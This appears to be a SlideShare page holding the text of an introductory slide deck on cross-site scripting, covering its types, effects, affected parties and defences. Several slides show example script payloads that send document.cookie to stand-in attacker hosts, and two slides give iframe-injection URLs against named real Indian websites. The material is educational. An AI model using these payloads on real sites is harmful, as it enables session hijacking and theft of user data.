Cross site scripting (xss)
•Télécharger en tant que PPTX, PDF•
0 j'aime•1,346 vues
A power point presentation on the topic Cross Site Scripting.
Recommandé
Contenu connexe
Tendances
Tendances (20)
En vedette
En vedette (11)
Similaire à Cross site scripting (xss)
Similaire à Cross site scripting (xss) (20)
Dernier
Dernier (20)
Cross site scripting (xss)
- 2. CROSS-SITE SCRIPTING (XSS) Cross-site scripting or XSS is a defined as a computer security vulnerability (weakness) found in web applications. XSS allows for code injection by malicious web users into Internet pages viewed by other users. In an XSS attack, the attacker gains the ability to see private user IDs, passwords, credit card information and other personal identification. 2/18/2014 2
- 3. XSS (-ve) effects stealing other user’s cookies stealing their private information performing actions on behalf of other users redirecting to other websites Showing ads in hidden IFRAMES and popups 2/18/2014 3
- 4. Cross Site Scripting Types Two known types: Reflected (Non-Persistent) • Link in other website or email 2/18/2014 Stored (Persistent) • Forum, bulletin board, feedback form 4
- 5. Reflected (Non-persistent)… Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an email message, or on some other web site 2/18/2014 5
- 6. Reflected (Non-Persistent) 1 Send e-mail with <script> tags embedded in the link. http://mybank.com/ account.php?variable=”><script>document.lo cation=’http://www.badguy.com/cgi-bin/ cookie.cgi’”%20+document.cookie</script> Follows link and the script executes 2 www.badguy.com Cookie collector Malicious content dose not get stored in the server The server bounces the original input to the victim without modification 2/18/2014 6
- 8. stored (persistent)…. In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible blog websites, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users. see original post<script>window.location = "http://www.hackers.com?yid=";</script> 2/18/2014 8
- 9. Stored (Persistent) Public forum web site 1 Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script> 2 Downlaod malicious code Upload malicious scripting commands to the public forum Browse Attacker 3 Victim The server stores the malicious content The server serves the malicious content in its original form 2/18/2014 9
- 11. 2/18/2014 11
- 12. 2/18/2014 12
- 13. 2/18/2014 13
- 14. 2/18/2014 14
- 15. 2/18/2014 15
- 16. 2/18/2014 16
- 17. Who is affected by XSS? XSS attack’s first target is the Client Client trusts server (Does not expect attack) Browser executes malicious script But second target = Company running the Server Loss of public image (Blame) Loss of customer trust Loss of money 2/18/2014 17
- 18. CRIMES RLEATED TO XSS:XSS Vulnerability found on Facebook Subdomain( https://developers.facebook.com/ ) - Discovered by Mauritania_Attacker ( AnonGhost ) 2/18/2014 18
- 19. Time Now Tv & Shiksha Official Websites An 21 Years Old Information Security Expert, Narendra Bhati (R00t Sh3ll The Untracable) From Sheoganj Rajasthan. FEB- 2013 XSS Code for TIMES OF INDIA TV:http://www.timesnow.tv/videosearchresult.cms?query="/><iframe+src="http://www.breakth esecurity.com"+width="1000px"+height="1000px"></iframe>&srchcombo=1&x=0&y=0 #sthash.Pm0cUkgL.dpuf 2/18/2014 19
- 20. XSS Code for Shiksha.com http://www.shiksha.com/search/index?keyword="/><iframe+src="http://www.breakthesecurit y.com"+width=1000+height=1000></iframe>&start=0&institute_rows=-1&content_rows=1&country_id=&city_id=&zone_id=&locality_id=&course_level=&course_type=&min_duratio n=&max_duration=&search_type=&search_data_type=&sort_type=&utm_campaign=site_s earch&utm_medium=internal&utm_source=shiksha&from_page=homepage&autosuggesto r_suggestion_shown=5#sthash.Pm0cUkgL.dpuf 2/18/2014 20
- 21. Clint side •Cookie Security •Verify email •Always update Server side •Input validation (Black listing VS White listing) •Encode all meta characters send to the client •keep track of user sessions •Web application firewall •Always test 2/18/2014 21
- 22. 2/18/2014 22